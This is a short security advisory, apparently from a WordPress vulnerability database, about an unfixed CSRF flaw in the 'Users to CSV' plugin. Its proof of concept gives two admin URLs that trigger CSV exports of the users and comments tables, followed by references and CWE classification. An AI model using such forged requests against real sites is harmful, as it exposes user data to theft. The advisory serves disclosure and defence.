WordPress Plugin Vulnerabilities

Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)

Description

The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) security vulnerability.

Proof of Concept

http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users
http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments

Affects Plugins

Plugin icon
users-to-csv
No known fix

References

URL
https://packetstormsecurity.com/files/#132318/
URL
https://seclists.org/fulldisclosure/2015/Jun/44

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
ethicalhack3r
Verified
No
WPVDB ID
be631224-98cf-4997-9650-7445df936db3

Timeline

Publicly Published
2015-06-15 (about 8 years ago)
Added
2015-06-15 (about 8 years ago)
Last Updated
2019-10-21 (about 4 years ago)

Other

Published
Title
Published
2023-07-24
Title
Perelink Pro <= 2.1.4 - Settings Update via CSRF
Published
2022-05-06
Title
Remove CPT Base < 5.9 - CPT Deletion via CSRF
Published
2023-07-17
Title
myCred – Points, Rewards, Gamification, Ranks, Badges & Loyalty Plugin < 2.5.1 - Cross-Site Request Forgery
Published
2023-01-04
Title
Logaster Logo Generator <= 1.3 - Cross-Site Request Forgery (CSRF)
Published
2024-02-26
Title
SMS Alert Order Notifications – WooCommerce < 3.7.0 - Cross-Site Request Forgery